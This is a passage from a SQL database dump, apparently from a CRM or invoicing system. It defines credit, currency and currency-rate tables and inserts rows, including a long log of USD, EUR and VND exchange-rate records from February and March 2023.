  `amount` decimal(15,2) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcredits`
--

INSERT INTO `tblcredits` (`id`, `invoice_id`, `credit_id`, `staff_id`, `date`, `date_applied`, `amount`) VALUES
(3, 7, 10, 1, '2022-03-31', '2022-03-31 16:12:48', 11120000.00);

-- --------------------------------------------------------

--
-- Table structure for table `tblcurrencies`
--

CREATE TABLE `tblcurrencies` (
  `id` int(11) NOT NULL,
  `symbol` varchar(10) NOT NULL,
  `name` varchar(100) NOT NULL,
  `decimal_separator` varchar(5) DEFAULT NULL,
  `thousand_separator` varchar(5) DEFAULT NULL,
  `placement` varchar(10) DEFAULT NULL,
  `isdefault` tinyint(1) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcurrencies`
--

INSERT INTO `tblcurrencies` (`id`, `symbol`, `name`, `decimal_separator`, `thousand_separator`, `placement`, `isdefault`) VALUES
(1, '$', 'USD', '.', ',', 'before', 0),
(2, '€', 'EUR', ',', '.', 'before', 0),
(3, ' đ', 'VND', ',', '.', 'after', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblcurrency_rates`
--

CREATE TABLE `tblcurrency_rates` (
  `id` int(10) UNSIGNED NOT NULL,
  `from_currency_id` int(11) DEFAULT NULL,
  `from_currency_name` varchar(100) DEFAULT NULL,
  `from_currency_rate` decimal(15,6) NOT NULL DEFAULT 0.000000,
  `to_currency_id` int(11) DEFAULT NULL,
  `to_currency_name` varchar(100) DEFAULT NULL,
  `to_currency_rate` decimal(15,6) NOT NULL DEFAULT 0.000000,
  `date_updated` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcurrency_rates`
--

INSERT INTO `tblcurrency_rates` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date_updated`) VALUES
(1, 1, 'USD', 1.000000, 2, 'EUR', 0.940290, '2023-09-22 16:45:02'),
(2, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-22 16:45:02'),
(3, 2, 'EUR', 1.000000, 1, 'USD', 1.063500, '2023-09-22 16:45:03'),
(4, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-22 16:45:03'),
(5, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-22 16:45:04'),
(6, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-22 16:45:04');

-- --------------------------------------------------------

--
-- Table structure for table `tblcurrency_rate_logs`
--

CREATE TABLE `tblcurrency_rate_logs` (
  `id` int(10) UNSIGNED NOT NULL,
  `from_currency_id` int(11) DEFAULT NULL,
  `from_currency_name` varchar(100) DEFAULT NULL,
  `from_currency_rate` decimal(15,6) NOT NULL DEFAULT 0.000000,
  `to_currency_id` int(11) DEFAULT NULL,
  `to_currency_name` varchar(100) DEFAULT NULL,
  `to_currency_rate` decimal(15,6) NOT NULL DEFAULT 0.000000,
  `date` date DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcurrency_rate_logs`
--

INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(1, 1, 'USD', 0.000000, 2, 'EUR', 0.964690, '2022-11-30'),
(2, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2022-11-30'),
(3, 2, 'EUR', 0.000000, 1, 'USD', 1.036600, '2022-11-30'),
(4, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2022-11-30'),
(5, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2022-11-30'),
(6, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2022-11-30'),
(7, 1, 'USD', 1.000000, 2, 'EUR', 0.964690, '2023-02-23'),
(8, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(9, 2, 'EUR', 1.000000, 1, 'USD', 1.036600, '2023-02-23'),
(10, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(11, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-23'),
(12, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(13, 1, 'USD', 0.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(14, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(15, 2, 'EUR', 0.000000, 1, 'USD', 1.064400, '2023-02-23'),
(16, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(17, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-23'),
(18, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(19, 1, 'USD', 1.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(20, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(21, 2, 'EUR', 1.000000, 1, 'USD', 1.064400, '2023-02-23'),
(22, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(23, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-23'),
(24, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(25, 1, 'USD', 0.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(26, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(27, 2, 'EUR', 0.000000, 1, 'USD', 1.064400, '2023-02-23'),
(28, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(29, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-23'),
(30, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(31, 1, 'USD', 1.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(32, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(33, 2, 'EUR', 1.000000, 1, 'USD', 1.064400, '2023-02-23'),
(34, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(35, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-23'),
(36, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(37, 1, 'USD', 0.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(38, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(39, 2, 'EUR', 0.000000, 1, 'USD', 1.064400, '2023-02-23'),
(40, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(41, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-23'),
(42, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(43, 1, 'USD', 1.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(44, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(45, 2, 'EUR', 1.000000, 1, 'USD', 1.064400, '2023-02-23'),
(46, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-23'),
(47, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-23'),
(48, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(49, 1, 'USD', 0.000000, 2, 'EUR', 0.939500, '2023-02-23'),
(50, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(51, 2, 'EUR', 0.000000, 1, 'USD', 1.064400, '2023-02-23'),
(52, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-23'),
(53, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-23'),
(54, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-23'),
(55, 1, 'USD', 1.000000, 2, 'EUR', 0.939500, '2023-02-24'),
(56, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(57, 2, 'EUR', 1.000000, 1, 'USD', 1.064400, '2023-02-24'),
(58, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(59, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-24'),
(60, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(61, 1, 'USD', 0.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(62, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(63, 2, 'EUR', 0.000000, 1, 'USD', 1.061600, '2023-02-24'),
(64, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(65, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-24'),
(66, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(67, 1, 'USD', 1.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(68, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(69, 2, 'EUR', 1.000000, 1, 'USD', 1.061600, '2023-02-24'),
(70, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(71, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-24'),
(72, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(73, 1, 'USD', 0.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(74, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(75, 2, 'EUR', 0.000000, 1, 'USD', 1.061600, '2023-02-24'),
(76, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(77, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-24'),
(78, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(79, 1, 'USD', 1.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(80, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(81, 2, 'EUR', 1.000000, 1, 'USD', 1.061600, '2023-02-24'),
(82, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(83, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-24'),
(84, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(85, 1, 'USD', 0.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(86, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(87, 2, 'EUR', 0.000000, 1, 'USD', 1.061600, '2023-02-24'),
(88, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(89, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-24'),
(90, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(91, 1, 'USD', 1.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(92, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(93, 2, 'EUR', 1.000000, 1, 'USD', 1.061600, '2023-02-24'),
(94, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-24'),
(95, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-24'),
(96, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(97, 1, 'USD', 0.000000, 2, 'EUR', 0.941970, '2023-02-24'),
(98, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(99, 2, 'EUR', 0.000000, 1, 'USD', 1.061600, '2023-02-24'),
(100, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-24'),
(101, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-24'),
(102, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-24'),
(103, 1, 'USD', 1.000000, 2, 'EUR', 0.941970, '2023-02-25'),
(104, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(105, 2, 'EUR', 1.000000, 1, 'USD', 1.061600, '2023-02-25'),
(106, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(107, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-25'),
(108, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(109, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(110, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(111, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-25'),
(112, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(113, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-25'),
(114, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(115, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(116, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(117, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-25'),
(118, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(119, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-25'),
(120, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(121, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(122, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(123, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-25'),
(124, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(125, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-25'),
(126, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(127, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(128, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(129, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-25'),
(130, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(131, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-25'),
(132, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(133, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(134, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(135, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-25'),
(136, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(137, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-25'),
(138, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(139, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(140, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(141, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-25'),
(142, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-25'),
(143, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-25'),
(144, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(145, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-25'),
(146, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(147, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-25'),
(148, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-25'),
(149, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-25'),
(150, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-25'),
(151, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(152, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(153, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-26'),
(154, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(155, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-26'),
(156, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(157, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(158, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(159, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-26'),
(160, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(161, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-26'),
(162, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(163, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(164, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(165, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-26'),
(166, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(167, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-26'),
(168, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(169, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(170, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(171, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-26'),
(172, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(173, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-26'),
(174, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(175, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(176, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(177, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-26'),
(178, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(179, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-26'),
(180, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(181, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(182, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(183, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-26'),
(184, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(185, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-26'),
(186, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(187, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(188, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(189, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-26'),
(190, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-26'),
(191, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-26'),
(192, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(193, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-26'),
(194, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(195, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-26'),
(196, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-26'),
(197, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-26'),
(198, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-26'),
(199, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(200, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(201, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-27'),
(202, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(203, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-27'),
(204, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(205, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(206, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(207, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-27'),
(208, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(209, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-27'),
(210, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(211, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(212, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(213, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-27'),
(214, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(215, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-27'),
(216, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(217, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(218, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(219, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-27'),
(220, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(221, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-27'),
(222, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(223, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(224, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(225, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-27'),
(226, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(227, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-27'),
(228, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(229, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(230, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(231, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-27'),
(232, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(233, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-27'),
(234, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(235, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(236, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(237, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-27'),
(238, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-27'),
(239, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-27'),
(240, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(241, 1, 'USD', 0.000000, 2, 'EUR', 0.946070, '2023-02-27'),
(242, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(243, 2, 'EUR', 0.000000, 1, 'USD', 1.057000, '2023-02-27'),
(244, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-27'),
(245, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-27'),
(246, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-27'),
(247, 1, 'USD', 1.000000, 2, 'EUR', 0.946070, '2023-02-28'),
(248, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(249, 2, 'EUR', 1.000000, 1, 'USD', 1.057000, '2023-02-28'),
(250, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(251, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-28'),
(252, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(253, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(254, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(255, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-02-28'),
(256, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(257, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-28'),
(258, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(259, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(260, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(261, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-02-28'),
(262, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(263, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-28'),
(264, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(265, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(266, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(267, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-02-28'),
(268, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(269, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-28'),
(270, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(271, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(272, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(273, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-02-28'),
(274, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(275, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-28'),
(276, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(277, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(278, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(279, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-02-28'),
(280, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(281, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-28'),
(282, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(283, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(284, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(285, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-02-28'),
(286, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-02-28'),
(287, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-02-28'),
(288, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(289, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-02-28'),
(290, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(291, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-02-28'),
(292, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-02-28'),
(293, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-02-28'),
(294, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-02-28'),
(295, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-03-01'),
(296, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(297, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-03-01'),
(298, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(299, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-01'),
(300, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(301, 1, 'USD', 0.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(302, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(303, 2, 'EUR', 0.000000, 1, 'USD', 1.061900, '2023-03-01'),
(304, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(305, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-01'),
(306, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(307, 1, 'USD', 1.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(308, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(309, 2, 'EUR', 1.000000, 1, 'USD', 1.061900, '2023-03-01'),
(310, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-01'),
(311, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-01'),
(312, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-01'),
(313, 1, 'USD', 0.000000, 2, 'EUR', 0.941710, '2023-03-01'),
(314, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(315, 2, 'EUR', 0.000000, 1, 'USD', 1.061900, '2023-03-01'),
(316, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-01'),
(317, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-01'),
